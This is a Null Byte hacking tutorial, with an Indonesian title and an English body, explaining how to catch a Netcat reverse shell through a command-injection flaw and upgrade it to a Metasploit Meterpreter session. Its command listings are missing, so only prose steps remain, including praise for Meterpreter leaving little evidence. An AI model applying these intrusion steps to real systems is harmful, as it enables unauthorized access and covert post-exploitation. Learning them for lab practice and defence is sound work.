Menaikkan Common Shell ke Meterpreter
Source: https://null-byte.wonderhowto.com
Popping a shell is often the main goal of a hacker, and it can be exciting when executed properly, but sometimes they do have their limitations. Metasploit's Meterpreter probably needs no introduction, but this powerful, dynamic payload can offer a leg up over normal shells. To prove it, we'll show how to take a normal command shell and elevate it to a Meterpreter session.
Shell vs. Meterpreter
A shell is basically an interface that acts as a shortcut to the commands of an operating system. When it comes to hacking, there are two types of shells that are mainly talked about: bind shells and reverse shells.
A bind shell effectively binds itself to a certain port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, actively connects from the target machine to the attacking machine, where a listener is waiting for incoming connections.
Command shells provide a great way to really dig into the target, but they are not always the best option. Usually, they are constrained to the privileges of the user who initiated the shell, so the power that comes with root-level access isn't always available.
Meterpreter allows us to run post-exploitation modules and privilege escalation exploits locally on the target. It utilizes encrypted communication methods and nothing is written to disk during operation, making it a suitable weapon that leaves little to no evidence behind. Meterpreter offers a ton of other features and is highly extensible, which makes it an excellent addition to any hacker's arsenal.
Step 1 Start a Listener
To get started, fire up Metasploit. Type msfconsole in the terminal and we'll be greeted by a nice little welcome banner after it loads. We'll be using a great feature of Metasploit, which is the ability to set up a universal listener that can handle a wide range of different types of shells. Enter the following to load the module:
Next, we need to specify the listening host and port, using the IP address of our local machine and an arbitrary port number. We also need to set the payload — the versatile reverse TCP shell is an excellent choice here.
Type options at the prompt to verify that our settings are correct.
It looks like we're good to go. Type run to launch the handler, and it's now ready and waiting for an incoming connection.
Step 2 Get Shell with Netcat
Netcat is a powerful networking utility commonly used to troubleshoot connectivity issues, but it can also be utilized as a backdoor via command shells. We can use this tool, coupled with a command injection vulnerability, to spawn a shell and connect back to our local machine. If all goes well, the handler that we set up earlier will catch the shell and we'll be able to issue commands.
This vulnerability lets us append system commands to the input for the ping utility.
Here, we've tacked on the Netcat command to spawn a shell and connect to our local machine on port 1234:
After a moment, back in the terminal with our handler, we see that a session is opened up. We can now issue commands like id and uname -a to verify this.
Finally, we need to background this session by pressing Ctrl-Z, followed by Y to confirm.
Step 3 Elevate Shell to Meterpreter Session
Now that we have attained a session on the target, we can upgrade that humble shell to a full-fledged Meterpreter session. This will allow for greater flexibility when it comes to interacting with the target.
In order to view any sessions that are currently open, type sessions at the prompt. Below, we can see the session we opened earlier, along with its ID, shell type, and connection information.
The easiest way to transform a regular session into a Meterpreter session is to use the -u flag. Issue the sessions command with the appropriate ID and watch the magic happen.
Now it seems like nothing really happened, but in fact, we've opened a Meterpreter session in the background — it doesn't automatically drop us into it. If we issue the sessions command again, it will list our new Meterpreter session with an ID of 2. We can then use the -i flag to interact with it.
And now we have a Meterpreter shell. However, there is one other way to elevate a normal shell to a Meterpreter session that is similar to the method outlined above, and that is to manually use the shell_to_meterpreter post-exploitation module.
Alternative Way to Elevate Shell to Meterpreter Session
To load it, type the following.
All we have to do is specify the existing session we want to upgrade. After that, just to be sure, we can view the current settings with the options command.
Type run to kick it off.
Again, this opens up the new session in the background, so we have to issue the sessions command to determine the correct ID.
We can see that this new Meterpreter session has an ID of 3. Now we are ready to interact with it.
Last updated